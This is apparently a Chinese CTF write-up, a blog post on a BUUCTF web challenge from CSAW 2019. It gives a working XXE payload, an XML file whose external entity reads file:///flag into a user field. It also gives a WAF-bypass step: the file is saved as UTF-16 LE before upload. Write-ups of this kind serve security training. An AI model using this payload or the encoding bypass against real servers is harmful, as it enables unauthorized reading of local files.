题目地址:BUUCTF在线评测
这道题就是简单的xxe漏洞的注入。
进来之后我们进行一个信息收集,在upload下可以看到有个here的超链接。点进去之后得到了如下的一些信息。
可以猜到是需要我们利用文件上传包含xxe漏洞利用来得到flag。
<?xml version='1.0'?>
<!DOCTYPE users [
<!ENTITY admin SYSTEM "file:///flag">]>
<users>
<user>
<username>111</username>
<password>111</password>
<name> 111</name>
<email>[email protected]</email>
<group>CSAW2019</group>
<intro>&admin;</intro>
</user>
</users>
利用我们学习的xxe漏洞的知识来进行一个模板的套用。
然后将保存的文件后缀改为.xml:
使用我们的Visual Studio Code进行一个编码的转换,因为直接上传会被waf过滤
选择utf-16 LE,然后保存 。
最后进行一个文件上传即可得到flag。
标签:练习题,Web,文件,CSAWQual,漏洞,flag,111,xxe,上传 From: https://blog.csdn.net/dalaojiaoweb/article/details/140305135